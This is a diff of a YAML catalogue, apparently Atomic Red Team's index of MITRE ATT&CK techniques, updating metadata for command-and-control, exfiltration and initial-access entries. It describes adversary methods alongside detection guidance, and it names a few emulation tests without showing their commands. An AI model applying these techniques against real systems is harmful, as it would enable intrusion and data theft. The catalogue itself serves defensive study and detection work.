social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. + + Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed). + name: Web Service + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-03-26T23:26:10.297Z' + created: '2017-05-31T21:31:13.915Z' + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_contributors: + - Anastasios Pingios + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Connection Creation' x_mitre_detection: 'Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and @@ -61825,16 +65185,12 @@ command-and-control: for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection - x_mitre_contributors: - - Anastasios Pingios - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] exfiltration: T1020: @@ -61858,8 +65214,10 @@ exfiltration: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: exfiltration - modified: '2020-10-22T02:24:54.881Z' + modified: '2021-04-22T20:21:10.590Z' created: '2017-05-31T21:30:29.458Z' + x_mitre_contributors: + - ExtraHop x_mitre_is_subtechnique: false x_mitre_platforms: - Linux @@ -61871,9 +65229,12 @@ exfiltration: Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process use of network + - 'Command: Command Execution' + - 'Script: Script Execution' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' x_mitre_version: '1.2' identifier: T1020 atomic_tests: @@ -61945,10 +65306,8 @@ exfiltration: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_version: '1.0' identifier: T1030 atomic_tests: @@ -62040,11 +65399,11 @@ exfiltration: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_version: '1.2' identifier: T1048 atomic_tests: @@ -62142,10 +65501,11 @@ exfiltration: never been seen before are suspicious.(Citation: University of Birmingham C2) ' x_mitre_data_sources: - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62179,8 +65539,11 @@ exfiltration: Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces. x_mitre_data_sources: - - Process monitoring - - User interface + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62188,8 +65551,18 @@ exfiltration: atomic_tests: [] T1041: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:41.804Z' + modified: '2020-03-12T15:59:47.470Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exfiltration Over C2 Channel + description: Adversaries may steal data by exfiltrating it over an existing + command and control channel. Stolen data is encoded into the normal communications + channel using the same protocol as command and control communications. external_references: - source_name: mitre-attack external_id: T1041 @@ -62198,36 +65571,27 @@ exfiltration: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: Adversaries may steal data by exfiltrating it over an existing - command and control channel. Stolen data is encoded into the normal communications - channel using the same protocol as command and control communications. - name: Exfiltration Over C2 Channel - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-12T15:59:47.470Z' - created: '2017-05-31T21:30:41.804Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_data_sources: - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1011: technique: @@ -62263,8 +65627,11 @@ exfiltration: x_mitre_contributors: - Itzik Kotler, SafeBreach x_mitre_data_sources: - - User interface - - Process monitoring + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_version: '1.1' atomic_tests: [] T1052: @@ -62302,9 +65669,10 @@ exfiltration: x_mitre_detection: Monitor file access on removable media. Detect processes that execute when removable media are mounted. x_mitre_data_sources: - - Process monitoring - - Data loss prevention - - File monitoring + - 'Process: Process Creation' + - 'File: File Access' + - 'Drive: Drive Creation' + - 'Command: Command Execution' x_mitre_version: '1.1' atomic_tests: [] T1048.001: @@ -62353,11 +65721,11 @@ exfiltration: If recovered, these keys can be used to decrypt network data from command and control channels. " x_mitre_data_sources: - - Malware reverse engineering - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62365,25 +65733,6 @@ exfiltration: atomic_tests: [] T1048.003: technique: - created: '2020-03-15T15:37:47.583Z' - modified: '2020-03-28T00:50:31.361Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - type: attack-pattern - id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b - description: "Adversaries may steal data by exfiltrating it over an un-encrypted - network protocol other than that of the existing command and control channel. - The data may also be sent to an alternate network location from the main command - and control server. \n\nAdversaries may opt to obfuscate this data, without - the use of encryption, within network protocols that are natively unencrypted - (such as HTTP, FTP, or DNS). This may include custom or publicly available - encoding/compression algorithms (such as base64) as well as embedding data - within protocol headers and fields. " - name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1048.003 @@ -62392,24 +65741,44 @@ exfiltration: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol + description: "Adversaries may steal data by exfiltrating it over an un-encrypted + network protocol other than that of the existing command and control channel. + The data may also be sent to an alternate network location from the main command + and control server. \n\nAdversaries may opt to obfuscate this data, without + the use of encryption, within network protocols that are natively unencrypted + (such as HTTP, FTP, or DNS). This may include custom or publicly available + encoding/compression algorithms (such as base64) as well as embedding data + within protocol headers and fields. " + id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + modified: '2020-03-28T00:50:31.361Z' + created: '2020-03-15T15:37:47.583Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ' - x_mitre_network_requirements: true - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1048.003 atomic_tests: - name: Exfiltration Over Alternative Protocol - HTTP @@ -62559,12 +65928,10 @@ exfiltration: never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity. x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62599,9 +65966,10 @@ exfiltration: x_mitre_detection: Monitor file access on removable media. Detect processes that execute when removable media are mounted. x_mitre_data_sources: - - Process monitoring - - Data loss prevention - - File monitoring + - 'Process: Process Creation' + - 'File: File Access' + - 'Drive: Drive Creation' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62636,12 +66004,10 @@ exfiltration: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have @@ -62683,12 +66049,10 @@ exfiltration: or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity. x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62696,41 +66060,40 @@ exfiltration: atomic_tests: [] T1029: technique: - id: attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Transfer - description: |- - Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. - - When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). + created: '2017-05-31T21:30:34.139Z' + modified: '2020-03-28T00:26:48.769Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1029 external_id: T1029 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-28T00:26:48.769Z' - created: '2017-05-31T21:30:34.139Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_network_requirements: true + description: |- + Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. + + When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). + name: Scheduled Transfer + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466 + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious. - x_mitre_data_sources: - - Netflow/Enclave netflow - - Process use of network - - Process monitoring - x_mitre_version: '1.1' + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false atomic_tests: [] T1020.001: technique: @@ -62778,9 +66141,8 @@ exfiltration: x_mitre_platforms: - Network x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture - - Network protocol analysis + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze @@ -62793,18 +66155,13 @@ exfiltration: atomic_tests: [] T1537: technique: - external_references: - - source_name: mitre-attack - external_id: T1537 - url: https://attack.mitre.org/techniques/T1537 - - source_name: DOJ GRU Indictment Jul 2018 - description: Mueller, R. (2018, July 13). Indictment - United States of America - vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. - url: https://www.justice.gov/file/1080281/download - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Transfer Data to Cloud Account + created: '2019-08-30T13:03:04.038Z' + modified: '2021-03-08T10:33:01.280Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6 description: "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration @@ -62817,32 +66174,36 @@ exfiltration: have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) " - id: attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-29T23:43:44.256Z' - created: '2019-08-30T13:03:04.038Z' - x_mitre_is_subtechnique: false + name: Transfer Data to Cloud Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1537 + url: https://attack.mitre.org/techniques/T1537 + - source_name: DOJ GRU Indictment Jul 2018 + description: Mueller, R. (2018, July 13). Indictment - United States of America + vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. + url: https://www.justice.gov/file/1080281/download + x_mitre_platforms: + - IaaS + x_mitre_contributors: + - Praetorian + x_mitre_network_requirements: true + x_mitre_permissions_required: + - User + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'Snapshot: Snapshot Creation' + - 'Snapshot: Snapshot Modification' + - 'Cloud Storage: Cloud Storage Modification' + - 'Cloud Storage: Cloud Storage Creation' x_mitre_detection: 'Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ' - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_version: '1.0' - x_mitre_permissions_required: - - User - x_mitre_network_requirements: true - x_mitre_contributors: - - Praetorian - x_mitre_platforms: - - Azure - - AWS - - GCP + x_mitre_is_subtechnique: false atomic_tests: [] initial-access: T1078.004: @@ -62882,20 +66243,17 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' + modified: '2021-03-16T12:45:15.399Z' created: '2020-03-13T20:36:57.378Z' x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - Azure AD - Office 365 + - SaaS + - IaaS + - Google Workspace x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours. @@ -62903,7 +66261,7 @@ initial-access: - User - Administrator x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' atomic_tests: [] T1195.003: technique: @@ -62934,11 +66292,6 @@ initial-access: x_mitre_detection: Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. - x_mitre_data_sources: - - Component firmware - - BIOS - - Disk forensics - - EFI x_mitre_platforms: - Linux - macOS @@ -62979,9 +66332,6 @@ initial-access: or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ' - x_mitre_data_sources: - - File monitoring - - Web proxy x_mitre_platforms: - Linux - macOS @@ -63025,9 +66375,6 @@ initial-access: - Linux - macOS - Windows - x_mitre_data_sources: - - File monitoring - - Web proxy x_mitre_detection: 'Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking @@ -63048,15 +66395,22 @@ initial-access: url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. - source_name: Metasploit SSH Module url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. + description: Metasploit. (n.d.). Retrieved April 12, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Default Accounts description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d @@ -63070,9 +66424,9 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' + modified: '2021-04-05T20:14:26.846Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -63082,20 +66436,18 @@ initial-access: for default credentials or SSH keys, and if any are discovered, they should be updated immediately. x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers identifier: T1078.001 atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges @@ -63182,8 +66534,8 @@ initial-access: Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. x_mitre_data_sources: - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: - Linux - macOS @@ -63270,12 +66622,11 @@ initial-access: Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system. x_mitre_data_sources: - - Packet capture - - Network device logs - - Process use of network - - Web proxy - - Network intrusion detection system - - SSL/TLS inspection + - 'File: File Creation' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'Application Log: Application Log Content' x_mitre_version: '1.2' atomic_tests: [] T1190: @@ -63295,12 +66646,14 @@ initial-access: accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). - \n\nIf an application is hosted on cloud-based infrastructure, then exploiting - it may lead to compromise of the underlying instance. This can allow an adversary - a path to access the cloud APIs or to take advantage of weak identity and - access management policies.\n\nFor websites and databases, the OWASP top 10 - and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: - OWASP Top 10)(Citation: CWE top 25)" + \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, + then exploiting it may lead to compromise of the underlying instance or container. + This can allow an adversary a path to access the cloud or container APIs, + exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), + or take advantage of weak identity and access management policies.\n\nFor + websites and databases, the OWASP top 10 and CWE top 25 highlight the most + common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top + 25)" external_references: - source_name: mitre-attack external_id: T1190 @@ -63340,30 +66693,25 @@ initial-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-21T01:10:54.358Z' + modified: '2021-04-12T18:25:16.409Z' created: '2018-04-18T17:59:24.739Z' x_mitre_platforms: - - Linux - Windows - - macOS - - AWS - - GCP - - Azure + - IaaS - Network + - Linux + - macOS + - Containers x_mitre_detection: Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - Packet capture - - Web logs - - Web application firewall logs - - Application logs - x_mitre_version: '2.2' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + x_mitre_version: '2.3' x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team - Praetorian x_mitre_is_subtechnique: false atomic_tests: [] @@ -63376,6 +66724,8 @@ initial-access: Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. + + Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware) external_references: - source_name: mitre-attack external_id: T1133 @@ -63387,6 +66737,14 @@ initial-access: description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' source_name: Volexity Virtual Private Keylogging + - source_name: Trend Micro Exposed Docker Server + url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html + description: Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants + Target Exposed Docker Servers. Retrieved April 5, 2021. + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern @@ -63395,24 +66753,39 @@ initial-access: phase_name: persistence - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-06-19T20:07:09.600Z' + modified: '2021-04-22T20:22:02.443Z' created: '2017-05-31T21:31:44.421Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows - Linux + - Containers x_mitre_permissions_required: - User - x_mitre_detection: Follow best practices for detecting adversary use of [Valid - Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to - remote services. Collect authentication logs and analyze for unusual access - patterns, windows of activity, and access outside of normal business hours. + x_mitre_detection: |- + Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours. + + When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application. x_mitre_data_sources: - - Authentication logs + - 'Application Log: Application Log Content' + - 'Logon Session: Logon Session Metadata' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: + - ExtraHop + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Rory McCune, Aqua Security + - Yuval Avrahami, Palo Alto Networks + - Jay Chen, Palo Alto Networks + - Brad Geesaman, @bradgeesaman + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee - Daniel Oakley - Travis Smith, Tripwire - x_mitre_version: '2.1' + x_mitre_version: '2.2' identifier: T1133 atomic_tests: - name: Running Chrome VPN Extensions via the Registry 2 vpn extension @@ -63485,7 +66858,7 @@ initial-access: description: Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. source_name: Ossmann Star Feb 2011 - - url: http://www.bsidesto.ca/2015/slides/Weapons_of_a_Penetration_Tester.pptx + - url: https://www.youtube.com/watch?v=lDvf4ScWbcQ description: Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018. @@ -63508,7 +66881,7 @@ initial-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-09-16T16:12:48.086Z' + modified: '2021-04-22T17:47:04.476Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -63519,21 +66892,11 @@ initial-access: computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports." - x_mitre_data_sources: - - Asset management - - Data loss prevention x_mitre_version: '1.1' atomic_tests: [] T1078.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: 